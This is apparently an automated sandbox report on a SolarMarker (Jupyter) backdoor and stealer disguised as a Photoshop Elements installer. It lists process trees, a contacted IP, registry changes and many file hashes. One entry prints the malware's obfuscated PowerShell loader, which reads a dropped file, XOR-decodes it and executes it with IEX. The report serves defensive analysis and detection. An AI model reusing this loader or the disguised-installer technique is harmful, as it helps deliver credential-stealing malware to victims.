Malware Analysis Report

2024-10-16 02:56

Sample ID 231202-k7pfksbb89
Target 9ed713aab05f4d8d6c3483283b23c3f7dd68d7b7d03d85a2b906f70ee9240815.zip
SHA256 9ed713aab05f4d8d6c3483283b23c3f7dd68d7b7d03d85a2b906f70ee9240815
Tags
jupyter backdoor stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9ed713aab05f4d8d6c3483283b23c3f7dd68d7b7d03d85a2b906f70ee9240815

Threat Level: Known bad

The file 9ed713aab05f4d8d6c3483283b23c3f7dd68d7b7d03d85a2b906f70ee9240815.zip was found to be: Known bad.

Malicious Activity Summary

jupyter backdoor stealer trojan upx

Jupyter, SolarMarker

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

UPX packed file

Program crash

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-02 09:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-02 09:14

Reported

2023-12-02 09:18

Platform

win7-20231023-en

Max time kernel

120s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2FGQT.tmp\installer-bundle.tmp N/A

Processes

C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe

"C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

C:\Users\Admin\AppData\Local\Temp\is-2FGQT.tmp\installer-bundle.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2FGQT.tmp\installer-bundle.tmp" /SL5="$40108,310535746,790016,C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

Network

N/A

Files

memory/1336-1-0x0000000000400000-0x00000000004CE000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-2FGQT.tmp\installer-bundle.tmp

MD5 44829118fc0c9b36ea8d91f48dba8563
SHA1 30dfea0d7697799531f9ba8bb444e1ecc3725401
SHA256 8835af27dd9f28a3120d2430e4a69db22af8e927bdd7060dcb064be08c4aff02
SHA512 5da3eb4565372b5053a8b009bf22b57f957c9254cc0035a3f05a6143282b91743cef74cd14b8b2fa0eb0b6052fd158315d9e68040713ff50ad47f83607ce6814

C:\Users\Admin\AppData\Local\Temp\is-2FGQT.tmp\installer-bundle.tmp

MD5 44829118fc0c9b36ea8d91f48dba8563
SHA1 30dfea0d7697799531f9ba8bb444e1ecc3725401
SHA256 8835af27dd9f28a3120d2430e4a69db22af8e927bdd7060dcb064be08c4aff02
SHA512 5da3eb4565372b5053a8b009bf22b57f957c9254cc0035a3f05a6143282b91743cef74cd14b8b2fa0eb0b6052fd158315d9e68040713ff50ad47f83607ce6814

memory/2044-8-0x0000000000240000-0x0000000000241000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-A6NSU.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

memory/2044-15-0x0000000000400000-0x000000000070A000-memory.dmp

memory/1336-17-0x0000000000400000-0x00000000004CE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-02 09:14

Reported

2023-12-02 09:18

Platform

win10v2004-20231130-en

Max time kernel

124s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

Signatures

Jupyter, SolarMarker

backdoor trojan stealer jupyter

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-596315103-1488671723-776734015-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-596315103-1488671723-776734015-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-596315103-1488671723-776734015-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\PhotoshopElements_2024_LS30_win64.exe = "11001" C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4952 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp
PID 4952 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp
PID 4952 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp
PID 2288 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe
PID 2288 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe
PID 2288 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe

Processes

C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe

"C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp" /SL5="$4011A,310535746,790016,C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -commaND "IEX([TeXt.EncOdiNG]::UtF8.GEtString((({$F=[iO.FilE]::rEAdAlLByTES($ARgS[0]);(RM $ArGs[0]);RETuRN $F}.InVOkE('C:\USERs\AdMiN\apPdAtA\lOCAL\TEMP\iS-uL5s8.tmp\..\9C70Da122628352982AB7f7a1B2038cc.Tmp'))|%{$_ -bxor 'HDOBawNjxsiQTFEXqeSdbAYUkuJotWLh'[$K++%32]})))"

C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe

"C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3932 -ip 3932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 2664

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
NL 217.138.215.85:80 tcp
NL 217.138.215.85:80 tcp

Files

memory/4952-0-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/4952-2-0x0000000000400000-0x00000000004CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp

MD5 44829118fc0c9b36ea8d91f48dba8563
SHA1 30dfea0d7697799531f9ba8bb444e1ecc3725401
SHA256 8835af27dd9f28a3120d2430e4a69db22af8e927bdd7060dcb064be08c4aff02
SHA512 5da3eb4565372b5053a8b009bf22b57f957c9254cc0035a3f05a6143282b91743cef74cd14b8b2fa0eb0b6052fd158315d9e68040713ff50ad47f83607ce6814

memory/2288-6-0x0000000000910000-0x0000000000911000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\data.dat

MD5 9bd7bf9a6f40c37f84926c0d76a1c8ee
SHA1 1c3cc18b9b385ac3beb1c9abdef9f8d30a845d3f
SHA256 ee42700c2ae8107c42468e963644a7bb23afafd0982de494f1653ab3d4d29917
SHA512 53e8bcb2af707e21e633a2b9d206e553656b81d1efe95ece77e1b5043cd6cb756242970db4ba9a1afc138875f39fb57d64e19e3f9c9d112e15d657a433e79105

memory/1788-19-0x0000000073510000-0x0000000073CC0000-memory.dmp

memory/1788-18-0x0000000002E70000-0x0000000002EA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe

MD5 43843d75a5eead8ee3b71ee2adcba3fe
SHA1 980c1446b25652312010c86c661d20bdad647fdc
SHA256 bafd3e50fcbc0cf95c718e9bce72012991883908ec02b62806e0a6a451864483
SHA512 90547d04eebc6b5d250bb7f27e1eda926a56cebef1591879dbc36fb2112985bfdb29478ca1925a8727701cd52ce879fa6c4b74cce42649a3adf4558e94558c54

memory/1788-32-0x0000000005720000-0x0000000005D48000-memory.dmp

memory/1788-33-0x00000000050E0000-0x00000000050F0000-memory.dmp

memory/1788-24-0x00000000050E0000-0x00000000050F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hio1qdml.ood.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1788-34-0x0000000005670000-0x0000000005692000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe

MD5 43843d75a5eead8ee3b71ee2adcba3fe
SHA1 980c1446b25652312010c86c661d20bdad647fdc
SHA256 bafd3e50fcbc0cf95c718e9bce72012991883908ec02b62806e0a6a451864483
SHA512 90547d04eebc6b5d250bb7f27e1eda926a56cebef1591879dbc36fb2112985bfdb29478ca1925a8727701cd52ce879fa6c4b74cce42649a3adf4558e94558c54

memory/1788-49-0x0000000005EC0000-0x0000000005F26000-memory.dmp

memory/3932-52-0x0000000000B60000-0x00000000014E7000-memory.dmp

memory/1788-51-0x0000000005F30000-0x0000000005F96000-memory.dmp

memory/1788-56-0x0000000005FA0000-0x00000000062F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe

MD5 43843d75a5eead8ee3b71ee2adcba3fe
SHA1 980c1446b25652312010c86c661d20bdad647fdc
SHA256 bafd3e50fcbc0cf95c718e9bce72012991883908ec02b62806e0a6a451864483
SHA512 90547d04eebc6b5d250bb7f27e1eda926a56cebef1591879dbc36fb2112985bfdb29478ca1925a8727701cd52ce879fa6c4b74cce42649a3adf4558e94558c54

memory/1788-62-0x0000000006410000-0x000000000642E000-memory.dmp

memory/1788-63-0x0000000006470000-0x00000000064BC000-memory.dmp

C:\USERs\AdMiN\apPdAtA\lOCAL\TEMP\9C70Da122628352982AB7f7a1B2038cc.Tmp

MD5 9bd7bf9a6f40c37f84926c0d76a1c8ee
SHA1 1c3cc18b9b385ac3beb1c9abdef9f8d30a845d3f
SHA256 ee42700c2ae8107c42468e963644a7bb23afafd0982de494f1653ab3d4d29917
SHA512 53e8bcb2af707e21e633a2b9d206e553656b81d1efe95ece77e1b5043cd6cb756242970db4ba9a1afc138875f39fb57d64e19e3f9c9d112e15d657a433e79105

memory/1788-65-0x00000000073F0000-0x0000000007486000-memory.dmp

memory/1788-66-0x0000000006960000-0x000000000697A000-memory.dmp

memory/1788-67-0x00000000069B0000-0x00000000069D2000-memory.dmp

memory/1788-68-0x0000000007AC0000-0x0000000008064000-memory.dmp

memory/2288-71-0x0000000000400000-0x000000000070A000-memory.dmp

memory/4952-73-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/1788-74-0x00000000086F0000-0x0000000008D6A000-memory.dmp

memory/1788-75-0x0000000007990000-0x0000000007A84000-memory.dmp

memory/1788-76-0x0000000008110000-0x00000000081A2000-memory.dmp

memory/3932-77-0x0000000000B60000-0x00000000014E7000-memory.dmp

memory/1788-78-0x0000000073510000-0x0000000073CC0000-memory.dmp

memory/1788-80-0x00000000050E0000-0x00000000050F0000-memory.dmp

memory/1788-82-0x00000000050E0000-0x00000000050F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\Config.xml

MD5 9bf27f7e06b54fc3711224323d4fa105
SHA1 f870330d52a34c4e3f475ce117e779a510ff3501
SHA256 195a6eeb37951c00e8a3cd3366f0be21ab9aa4124379d5b8ec468a9368f477fd
SHA512 4727be8b5c550f3b578360512fc243ca9599112b44088066f6204b09d30238bc51100e1b45ddd549dae0f5990a924216cc0330aab9b036b8ab445d44306bdec0

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\carousel.js

MD5 44d3f90c842e5387dd782bc6097fabbd
SHA1 cb6f6d2d643a5d958bd00d7c212bd35c2bb4ddeb
SHA256 dda5350e57a484a80ca07489f18f064d67e21ccb08b36ff2bfa2c37657d6f37f
SHA512 3bb152da1e07a6a86c375a3790c65c185557f92b0148a0c41cb4e1c5d079c3f9e7ec33f6e08652669ab6bfcdabf61b358fdaa353ccf1bfb0d99e4b8c5f6188c6

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\index.html

MD5 348352baa22f54466691b8673b6b6c93
SHA1 5f6606ea02606fec542690e80273aa5ffaaff0ae
SHA256 39e5810acb9489edf3918adb3746255866975afc1f6ab65ffc2ba598c505d2b1
SHA512 f2749ae136ca182df2d0fe31dded8069d8ad915aa8beec02871a675be8f0666042b5e91f4db39f751a4aecb240dcdb1a23377eb4107ea77fb5b0a478090135d3

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\lib\jquery.min.js

MD5 e1288116312e4728f98923c79b034b67
SHA1 8b6babff47b8a9793f37036fd1b1a3ad41d38423
SHA256 ba6eda7945ab8d7e57b34cc5a3dd292fa2e4c60a5ced79236ecf1a9e0f0c2d32
SHA512 bf28a9a446e50639a9592d7651f89511fc4e583e213f20a0dff3a44e1a7d73ceefdb6597db121c7742bde92410a27d83d92e2e86466858a19803e72a168e5656

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\images\01_PSE2024_InstallerCarousel_ColorMatch_445x239.png

MD5 70155993a908dd3f179030722111dafd
SHA1 7f77a6da3295559977185127df0131dfeaab6401
SHA256 ce3db74c58b62c946144d90e1b98982846bfdba928f3832eff5dfb0800bd14dd
SHA512 f4f84a88984ea656a13ad7d2f171688910528692e4cdea2128c01eaaee1e342aed9cd381162b888634083b38b36d34eea31af05e8ba0790570fb26125e6926ee

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\images\02_PSE2024_InstallerCarousel_AddText_445x239.png

MD5 ecbdd07f272a819936179371478a8c3f
SHA1 ff77202067acb0463e7878c44004cf55549325c1
SHA256 d370c16bda414eceed68a3432a1c2ebd37e3e84151e667ca5fcc2da1a6876305
SHA512 1b9fbd76c08cdad927583f80fe5854ebff55741805ade093071a4beef0887def2cb456ad1b996ce110dd45f9e1b329457833bff4da0d391e0e7770d0ff119d21

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\images\03_PSE2024_InstallerCarousel_PhotoReels_445x239.png

MD5 6fc7d9d817decc0eca1f54c1540da1a0
SHA1 01959a4664cf3ea64a9cc85e6f8f60b25698107b
SHA256 9426bb5b0a9e4524c05c861781a8599646b83b0572f548a065c0ec6b791b016d
SHA512 1c492b0926915206a4a233fc1f00f3a5df21af7c957f00573bc7780e42a3afaa444002b9420c31a6ac65c89b4b72dd26e6f640302f8c8240592ab5ca3636fc39

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\images\04_PSE2024_InstallerCarousel_OneClickSelection_445x239.png

MD5 448941a2f024056569ef9817eefeb9a7
SHA1 544ec13242a4b9bd3e0a4d65079c55df006d6d24
SHA256 21efd9f1038b0d96e1d14a54e2a57f0ea407149f4c522cf23b617932f7336743
SHA512 1ce6c24d06ca13f200c7f856887f644c61afc2dfd5c25c35197002df4cd519a7eb98c253a6dcfc05017cd60a7dffbfd4489dc8c068f6e4638be546b7bec0bb62

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\images\05_PSE2024_InstallerCarousel_CallOut_445x239.png

MD5 d428286039502448a467942d6f20772e
SHA1 412c3ea49ec6bc7eb0c52d778bc4e95e33201d88
SHA256 61da52d1e93196300e6e2dd189cb3f5bd5389a42cea0903139e4d2f475cb6b2e
SHA512 0022eb09b113d0b5b584b08458a1d2fb6381758cc94675d98f3eb118d48b4b4444477371d5c9d82c89f8027874d8b70f533327716e27e2395fcf19e8f102eda4

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\images\05_PSE2024_InstallerCarousel_NewUI_445x239.png

MD5 3ed1397092bd3eafdfe71335bf5f5e3c
SHA1 9d1dbe45e4f1f12a0642eed50f91fdc8da3b888a
SHA256 8276f8be890abeec09b6aab522f7b45f60abe2bfa51fec333924537babf9d9e3
SHA512 5dbe0a094498615cd944f7a16888e4603dc357779a9ca8d8ddebdcf8ad8c72106effd316e3078037ebf254245d2c25bea5a3adfe773ccb783090206ee9d75a78

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\zz_zz\locale.json

MD5 8be468f56ed75df9fd6e9296736c7437
SHA1 6a5387d379e90a41df202f2186dd520f707c91b4
SHA256 aa811cb8bd2936a0b7f3f884e3347d9dbf4663abffdaf64401a13f7910c5ff86
SHA512 85c55278dbaf490ad4686cea2d3edcc54c891654fe16b5129f5d28c20c2ab9d3a6ab98286f93ffa09906e7d74fda9a1e8357abe2a9b2643879c5c775d9372510

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\zh_tw\locale.json

MD5 480263433597d1da400b0cab80456b3c
SHA1 b89620bdc7f4c0917eed3cd3d0de256a8d2ad23b
SHA256 def0a09f07831df10e11b346f2130509cb3ab30991c15a7fbdfe3d4af6889562
SHA512 b910ffdfb82c529e6f8e73a389b336117751356273ff4dac776f456e9298ef72c903a3f39a09ee2f01207fd7860e5be1bf05ab94843320b51e954589fa524805

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\zh_cn\locale.json

MD5 9558152fc5ba73dae53330e8f74103c3
SHA1 4583e8593c9bffe79db23f204d40f459ee4c579a
SHA256 e716dafac7426644d61477ef792c1d26ff02e683494e6ae3bbf18fe5672f2409
SHA512 a860cfeefab7a35cd5b9ba4a9735ecfcd593291d32a846f531ae507a5090db422f57c4c843341c50d33cc092fdac8bc1f48acaf217d400c71440998d2c571581

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\sv_se\locale.json

MD5 9a386bdd3d45947475ea973aa97a29fb
SHA1 f5da3004442f42b7a59512e35414e6f4758f0634
SHA256 7ec82e6599fa6e89dee2837ecf6544c9062d2133d2d265f181c2710cc22e9129
SHA512 796f9078350951eb62cf203e655f9170a1f02dfd9a16e327764955c27437e872e7c2b7612c0817cb4ba52051a0dc4e0b71925ddb0f1e10a81d1e5a41ae645a7b

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\ru_ru\locale.json

MD5 c08f7659efcc7319cea404c411852d7c
SHA1 960e5e87d616ce32c02101dd95e31a1b9aa5ca01
SHA256 0a2b57e247570fcd544ee2d76bb2520824da5bec5cc41c4b4082354a8f67087a
SHA512 92cee63dff79c0f6875ed2b74328995c8a88f473e1e4a412def3ea5f6601b2a5ef424d4d1fa45f0e59083a405771a74c7b282af6879c12e48f62e6af4bb19781

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\pl_pl\locale.json

MD5 a2bc40676845b4ddafeaab0523ff3671
SHA1 ad321f26cec3d9f2e6812ab525ab62403a145d6e
SHA256 55fc0609d045d6691129e51b196c71c3d4d98fc77a4dfe8fc6d62db75c7b1680
SHA512 cd0d8e9374f96fece5673e7f6d9c259329a991f0ce46c90afc41a51a937853abab71e64ac110fde3977b7638484e1cc204f08d33a779e067db637f1b54288ea9

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\nl_nl\locale.json

MD5 12b2faaec8a5524181967996ae808234
SHA1 45de57cf1b5c0cd4c7fa4cff9a2cef54e3f71b72
SHA256 06c55dfbc16f965839945b5ef066fe98f05ec8146d5b317d22c7d83d6976d806
SHA512 c04d15ab32e4f0de73e124e3a9cd10aee73c132acea29aa343a8daf5a9680a63b8a5675294880a7447269653f6339d9f215cc311755b3045659a165ef4777b75

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\ko_kr\locale.json

MD5 079c7c099407a71437825c7df92a92b1
SHA1 d8195b86e2fc055f86c6ebdf7bbed07a62157a1c
SHA256 7cbc5bc481d33e921c57652da070e5536a2292169c8c000548bc9f3b5367b9a6
SHA512 d7e5ff122d86fdb82a4e939e87f0fff794010a4c5f79fce0dc0ccb59e9392b5da7c52b1b99f2a33fa45998e58936a15b900f4af385df9684bc419e626d2634d7

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\ja_jp\locale.json

MD5 c31570e7ccb0fc3a4236b98abbd0cc08
SHA1 33afec87102c157c7a7b80d0058f40f591e0bbc3
SHA256 e645b23e361162f77edb93ac9028f094c8cc316b2b9aab88ea4690d43f554bfe
SHA512 6b3a2ff37b7ee09bb5fa55de7f072647de4f3a54e003c4d08860ab4335e3e2ebb0ab9d483aa853a77d46b2c65f02fcd7cbb5fd12b98c9a88f976d5e64759c035

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\it_it\locale.json

MD5 37879c31149c21fb5df9daadcd67e909
SHA1 20e314739d229e4b5da2af435bb0f251c06db0c9
SHA256 17ac21f4ad75970e29c644cac412483b4ab3b5611807e6c963fb72189ad9989b
SHA512 cf29ac25d8de0e0ad658b02af25a0b88ce643f26679be2b3f2e944e4b558facba94804cc88c32f550395708d0bda003ad09fcbbfa2a9fa8fb70820f7775e0113

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\fr_fr\locale.json

MD5 cc854f1036f7591bf00e2afeb465f659
SHA1 60457317a8f7f241c3f94595c13e37f4a8dc3352
SHA256 67a1c6394300fb01b4df5c8d1ecca0ab026797bd2c1beb09084bea356df89754
SHA512 8a26f56e1e6861c1cfcf07f8349ad0f32fc60d962e5433997b7f6f8b7d361f172a8cdb9717297ec91ecd7989a88b1a93d696382ba5852723528dbacd50f70d8e

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\es_es\locale.json

MD5 6d77fa7c087128f0ddacb5d1c86c95e2
SHA1 668e0ca6d419fa09a4db81bc8469baf686835a46
SHA256 320a7b8cd564064ec11925c96f0f323b19ffc82440439c4b87abff59a658f1e5
SHA512 2f66150b342f41f2968b44001ee53f6457081dd58a715ddf68dffae3b5213643aa7bb6435e7dfdab518533efdd0a407412b8df9948a7caab14a34be6c6377cdc

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\en_US\locale.json

MD5 ba0a234966cc8f97101f456c96ac4632
SHA1 8d00c13d7ef727210996bad946f763b9fdb69fb0
SHA256 168d3d6c0c91c0850865733eb244760f6bb3de0902395a443afc44b02592a048
SHA512 391f67878830e4c907eeb5a387b94e411a9862559677264ac18a19a36840035520de7e40b5bee041483c1ac6b66d3abdd389e7502c423d6fc701ab2088580d6e

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\de_de\locale.json

MD5 1fbc842f9a1e6f76e6acf661816fe62e
SHA1 d8b0ec6941246b4b423c1a15467efbcaec8121a7
SHA256 5d6abd25084cbf6f04d54c0164e5e0b3f89d969a91e2e850c7dae77588e571b8
SHA512 58a0a04e76b0d0f35eaa01b03f37dfbbedd60279ffccb26cc4fd34f6562dd8eca8cf1891578861a06c393aa82a5e41537618d6598e4080264fbb1b4c7b024170

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\Dictionary\cs_cz\locale.json

MD5 44db45efbb65bac062fb7c8b849a203d
SHA1 00e75ea3fadb83dfc42616dedf831f6bf8017edc
SHA256 3d4d96649072e293b76a41a497b19bc48811b2c8be9d2742255b96751bc09feb
SHA512 683d31755d68816b6cd575956c2161ff92a89c4b8c6d188683e435e6c4be5da621ff9819da65efb524c1983395154da8dae98ed94f236a71517bf13ce519a64b

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\css\styles.css

MD5 3a0ec2d2c5020a3cf45c13a87434b285
SHA1 12275d4d51de801ce28c88a0c246de22c6d08120
